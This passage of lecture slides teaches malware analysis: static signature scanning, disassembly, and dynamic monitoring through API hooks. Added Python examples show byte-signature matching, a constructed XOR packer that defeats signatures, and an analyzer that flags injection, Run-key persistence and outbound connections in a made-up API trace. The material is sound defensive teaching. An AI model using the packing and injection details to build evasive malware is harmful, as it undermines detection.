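        print(f"{kind:>18}: {items}")
```

Two details matter in practice: the wide-string pattern needs the 0x00 high bytes, so a plain ASCII scan silently misses most Windows UI text and registry paths, and a string that is only reachable after unpacking or decryption will not appear at all, which is the packed-sample caveat discussed under static analysis.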

Page 78: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Scripts analysis

• If the malicious code is written in JavaScript, VBScript or a shell scripting language, we can open the script and view its source code in a text editor. Script analysis helps analysts identify the most common script types within a short time.

• By analyzing the source code we can understand the function, flow, logical decisions and intent of the program. But script analysis requires the analyst to have some grounding in the programming language.

Page 79: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Scripts analysis

Page 80: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Disassembly analysis

• Static disassembly analysis means disassembling malicious code samples with a disassembler and then analyzing the assembly instructions and the annotations in the disassembly listing.

• Malicious code samples normally come as executable files, dynamic link libraries, software libraries or other kinds of files. In a standard text editor these files appear as an unreadable jumble. The compiler turns source code into executable code, generating binary data such as instruction opcodes, text and identifiers, and saves them in an object file.

Page 81: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

• The compile process is: source code → compiler → object file → linker → binary executable. A lot of useful information therefore survives in the binary, and a disassembler uses it to convert the binary executable code back into assembly language instructions.

• Disassemblers such as W32Dasm and IDA Pro are commonly used for static disassembly. These tools can jump to a specified location in the code, show the target address of a JMP instruction, show referenced strings and save the static assembly listing.

Page 82: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Merits and demerits of static analysis technology

• Merits:
• The malicious code is not executed, so the analysis system is safer.
• We can get a global view of the whole program before the executable is ever run.
• We can analyze the code in fine-grained detail without regard to any specific execution path.

Page 83: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

• Demerits:
• Because of the limitations of static analysis itself, things are missed and the analysis is not comprehensive.
• The vast majority of static analysis techniques (signature scanning in particular) can only detect known viruses or malicious code. They are powerless against encoded polymorphic variants or packed programs.
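As an added example that is not part of the original slides, the Python code below implements the static signature scanning mentioned under static analysis, with wildcard bytes in the style of a YARA hex string, and then shows the demerit just described: once the same routine is stored XOR-encoded behind a small decoder stub (a minimal stand-in for a packer), the signature no longer matches until the analyst undoes the encoding. The byte sequences, the signature and the one-byte key are constructed for this example and are not taken from any real sample.

```python
from typing import List, Optional

Signature = List[Optional[int]]  # None = wildcard byte ("??")


def parse_signature(text: str) -> Signature:
    """Parse a hex pattern such as "68 ?? ?? ?? ?? E8", where ?? matches any byte."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def scan(data: bytes, sig: Signature) -> Optional[int]:
    """Return the offset of the first match of sig in data, or None if absent."""
    n = len(sig)
    for i in range(len(data) - n + 1):
        if all(want is None or data[i + j] == want for j, want in enumerate(sig)):
            return i
    return None


# Constructed stand-in for a malicious routine (x86: push ebp; mov ebp,esp; sub esp,0x10;
# push imm32; call rel32; add esp,4; pop ebp; ret). Not taken from any real sample.
PAYLOAD = bytes.fromhex("55 8B EC 83 EC 10 68 44 33 22 11 E8 A1 00 00 00 83 C4 04 5D C3")
# A "variant" build: same code, different immediate and call target. Immediates and
# relative offsets change between builds, so the signature wildcards those bytes.
VARIANT = bytes.fromhex("55 8B EC 83 EC 10 68 00 20 40 00 E8 3F 01 00 00 83 C4 04 5D C3")
SIGNATURE = parse_signature("68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04")

# Constructed decoder stub standing in for a packer's loader (pushad; mov ecx,len;
# mov esi,addr; xor byte [esi],0x5A; inc esi; loop; popad). The real code behind it
# is stored XOR-ed with a one-byte key and is only restored in memory at run time.
DECODER_STUB = bytes.fromhex("60 B9 15 00 00 00 BE 00 10 40 00 80 36 5A 46 E2 FA 61")


def xor_pack(payload: bytes, key: int) -> bytes:
    """Emulate the packer: prepend the stub and XOR-encode the payload."""
    return DECODER_STUB + bytes(b ^ key for b in payload)


def xor_unpack(packed: bytes, key: int) -> bytes:
    """What the analyst does after reading the stub: strip it and undo the XOR."""
    return bytes(b ^ key for b in packed[len(DECODER_STUB):])


if __name__ == "__main__":
    packed = xor_pack(PAYLOAD, 0x5A)
    print("payload :", scan(PAYLOAD, SIGNATURE))
    print("variant :", scan(VARIANT, SIGNATURE))
    print("packed  :", scan(packed, SIGNATURE))
    print("unpacked:", scan(xor_unpack(packed, 0x5A), SIGNATURE))
```

The wildcards make the signature survive a recompiled variant, but a single-byte XOR is enough to defeat it on disk; the signature only fires again on the decoded bytes, which is why packed samples push the analyst toward dynamic analysis or unpacking before static scanning.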

Page 84: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

1.2.3 Dynamic analysis technology

• Dynamic analysis is analysis that monitors the malicious code while it runs.

• Dynamic analysis is divided into the dynamic tracing method and the external monitoring method, according to whether the semantics of the code are analyzed.

Page 85: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Dynamic tracing method

• We can execute the malicious code step by step and trace it with a debugger. Commonly used tools include OllyDbg, SoftICE, etc. Generally the process has two steps:

– Coarse tracing. We do not step into instructions such as CALL, REP and LOOP, but infer the function of the code from the result of executing them.

– Fine tracing of critical sections. Specific key code is traced and analyzed in detail. Understanding a program generally takes several passes, so intermediate results and instruction addresses should be recorded each time, since they are a great help for the next pass.

Page 86: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

External monitoring method

• We analyze changes to the system and monitor the behavior of the malicious code while it executes.

• System changes include changes to processes, files, the registry, network communication, etc.

• The core of this kind of dynamic analysis is hook technology. Hooks are used to monitor system calls and API functions throughout execution, and from those calls we detect and analyze the functions of the malicious code sample.

Page 87: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Commonly used HOOK technologies

• Import Address Table hook (IAT hook)
• System Service Descriptor Table hook (SSDT hook)
• Interrupt Descriptor Table hook (IDT hook)
• Driver I/O request packet processing hook (IRP hook)
• Inline hook

Page 88: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Dynamic monitoring program

• A dynamic monitoring program is built from hooked API functions. When the malicious code calls a hooked API function, we record the function's parameters and return value and track the malicious code with them.

• According to the level at which the hook sits in the operating system, monitoring programs are divided into user mode and kernel mode.

– User mode. A user-mode program is easy to implement and safe to use, but it can only observe API calls made in user mode.

– Kernel mode. A kernel-mode program uses lower-level monitoring technology and achieves better coverage, but it is complex to program, ports poorly between systems and has higher stability requirements.

Page 89: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

The contents of the monitoring include:

• Process

• Files

• The registry

• Startup

• Network communication

Page 90: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Process monitoring

• To carry out intrusion, propagation and attack, malicious code needs to create a new process or steal the legitimate privileges of a system process. Any slight change in the process list can be important reference information for analysis.

• Process monitoring focuses on process creation and termination, loading of dynamic link libraries, and thread creation and termination. It is implemented by hooking functions such as CreateProcess, TerminateProcess, LoadLibrary, CreateThread and CreateRemoteThread.

Page 91: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

File monitoring

• Generally speaking, malicious code always touches the file system while propagating and doing damage.

– It may read and write files, modify system programs and applications, add new files, or even embed its own code in other files.

• File monitoring focuses on file creation, read and write operations and deletion. It is implemented by hooking functions such as CreateFile, WriteFile, DeleteFile and OpenFile.

• On a system whose files carry digital signatures, monitoring can also be done by verifying the signatures.

– Signature information covers the system file's name, storage path, creation date, version number and other data. By comparing with the original signature we can tell whether a system file has been changed.

Page 92: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

The registry monitoring

• The Windows registry is a hierarchical database containing the configuration of the OS and of most applications.

• Malicious code generally has to change registry keys, that is, change the configuration of Windows, in order to alter the operating system's behavior and achieve its purpose.

• Registry monitoring focuses on the creation, modification and deletion of registry keys and values. It is implemented by hooking functions such as RegCreateKey, RegDeleteKey, RegSetValue and RegDeleteValue.

Page 93: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

The registry monitoring

The registry monitoring

Page 94: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Startup monitoring

• Malicious code uses autostart techniques so that it runs again the next time the system boots.

• There are many kinds of start methods, such as registry startup locations, file system startup locations (startup folders) and attaching to other applications (for example as an IE plug-in), and new methods keep appearing.

Page 95: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Network communication monitoring

• Malicious code has moved from single-host infection with a single behavior to propagation over the network and e-mail, combining the attack techniques of hackers with those of viruses.

• So our analysis should pay attention to the network behavior of the malicious code: check which TCP and UDP ports are listening on the system, and when running applications send or receive data through them.

• Network communication monitoring focuses on opening ports, creating sockets, connecting to remote hosts, and sending and receiving data. It hooks functions such as socket, bind, connect, send/sendto and recv/recvfrom.
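As an added example that is not from the original slides, the Python script below shows how an analyst consumes the output of an external monitoring program covering the five monitored areas above (process, file, registry, startup and network). It parses a constructed API-call trace in key=value form, counts calls per area, and raises findings for a dropped executable, an autostart Run-key entry, a WriteProcessMemory followed by CreateRemoteThread on the same process handle (injection), and an outbound connection leaving the lab network. The trace format, the API-to-area mapping and the finding rules are assumptions for this example; 198.51.100.23 is a documentation address standing in for an Internet host.

```python
import ipaddress
from collections import Counter
from typing import Dict, List

# Constructed API-call trace in the form a user-mode hook logger might write:
# one call per line, key=value fields (values in this sample contain no spaces).
TRACE = r"""
pid=2044 api=CreateFileW path=C:\Users\alice\AppData\Roaming\svchost.exe access=GENERIC_WRITE ret=0x1a4
pid=2044 api=WriteFile handle=0x1a4 bytes=48128 ret=1
pid=2044 api=RegSetValueExA key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run value=svchost data=C:\Users\alice\AppData\Roaming\svchost.exe ret=0
pid=2044 api=OpenProcess pid_target=1460 access=PROCESS_ALL_ACCESS ret=0x1b0
pid=2044 api=WriteProcessMemory handle=0x1b0 bytes=4096 ret=1
pid=2044 api=CreateRemoteThread handle=0x1b0 start=0x00450000 ret=0x1b4
pid=2044 api=socket family=AF_INET type=SOCK_STREAM ret=0x1c0
pid=2044 api=connect socket=0x1c0 addr=198.51.100.23:443 ret=0
pid=2044 api=send socket=0x1c0 bytes=312 ret=312
pid=2044 api=RegSetValueExA key=HKCU\Software\Example\Settings value=Theme data=dark ret=0
"""

# Which monitored area each hooked API belongs to (assumed mapping for this example)
API_CATEGORIES = {
    "process": ("CreateProcessW", "TerminateProcess", "LoadLibraryW", "CreateThread",
                "OpenProcess", "WriteProcessMemory", "CreateRemoteThread"),
    "file": ("CreateFileW", "WriteFile", "DeleteFileW", "CopyFileW"),
    "registry": ("RegCreateKeyExA", "RegSetValueExA", "RegDeleteKeyA", "RegDeleteValueA"),
    "network": ("socket", "bind", "listen", "connect", "send", "sendto", "recv", "recvfrom"),
}
CATEGORY_OF = {api: cat for cat, apis in API_CATEGORIES.items() for api in apis}

# Address ranges the analysis lab uses; anything else counts as an outbound contact.
LAB_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_lab_address(host: str) -> bool:
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:          # hostnames are not resolved here; treat them as external
        return False
    return any(ip in net for net in LAB_NETS)


def parse_line(line: str) -> Dict[str, str]:
    return dict(tok.split("=", 1) for tok in line.split())


def analyze(trace: str) -> Dict[str, object]:
    """Count calls per monitored area and derive behavioral findings from the trace."""
    counts: Counter = Counter()
    findings: List[str] = []
    target_of: Dict[str, str] = {}   # process handle -> target pid, from OpenProcess
    written = set()                  # handles that received WriteProcessMemory

    for line in trace.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        api = ev["api"]
        counts[CATEGORY_OF.get(api, "other")] += 1

        if api == "CreateFileW" and "GENERIC_WRITE" in ev.get("access", "") \
                and ev.get("path", "").lower().endswith(".exe"):
            findings.append(f"dropped executable: {ev['path']}")
        elif api == "RegSetValueExA" and "\\currentversion\\run" in ev.get("key", "").lower():
            findings.append(f"autostart: {ev['key']}\\{ev['value']} -> {ev['data']}")
        elif api == "OpenProcess":
            target_of[ev["ret"]] = ev["pid_target"]
        elif api == "WriteProcessMemory" and ev.get("handle") in target_of:
            written.add(ev["handle"])
        elif api == "CreateRemoteThread" and ev.get("handle") in written:
            findings.append(f"injection: remote thread in pid {target_of[ev['handle']]} "
                            f"after WriteProcessMemory")
        elif api == "connect":
            host, _, port = ev["addr"].rpartition(":")
            if not is_lab_address(host):
                findings.append(f"outbound connection: {host}:{port} (outside lab ranges)")

    return {"by_category": dict(counts), "findings": findings}


if __name__ == "__main__":
    result = analyze(TRACE)
    print("calls per area:", result["by_category"])
    for f in result["findings"]:
        print("finding:", f)
```

The injection rule is deliberately stateful: WriteProcessMemory or CreateRemoteThread alone is common in legitimate software, and it is the sequence on one handle returned by OpenProcess that is the signal. A user-mode hook logger only sees what the sample calls through the hooked API layer; a sample that issues system calls directly, or that is triggered only under conditions the sandbox did not meet, produces a trace with nothing to find.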

Page 96: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

In conclusion

• In this chapter we introduced malicious code in computer networks from two aspects: the types of malicious code, and malicious code detection and analysis.

• Malicious code includes viruses, worms, malicious mobile code, backdoors, Trojans and rootkits. Each has its own infection and propagation characteristics, and their purposes and properties also differ. Only with a deep understanding of them can we lay a solid foundation for analysis and detection.

Page 97: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

In conclusion

• Malicious code analysis must be conducted in the light of the features of malicious code. Analysis technologies include static analysis and dynamic analysis.

• Static analysis does not execute the malicious code and cannot damage the analysis system, but it has limitations. Dynamic analysis monitors the malicious code while it runs and is divided into the dynamic tracing method and the external monitoring method. Malicious code analysis is the foundation of malicious code detection and prevention.

Page 98: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.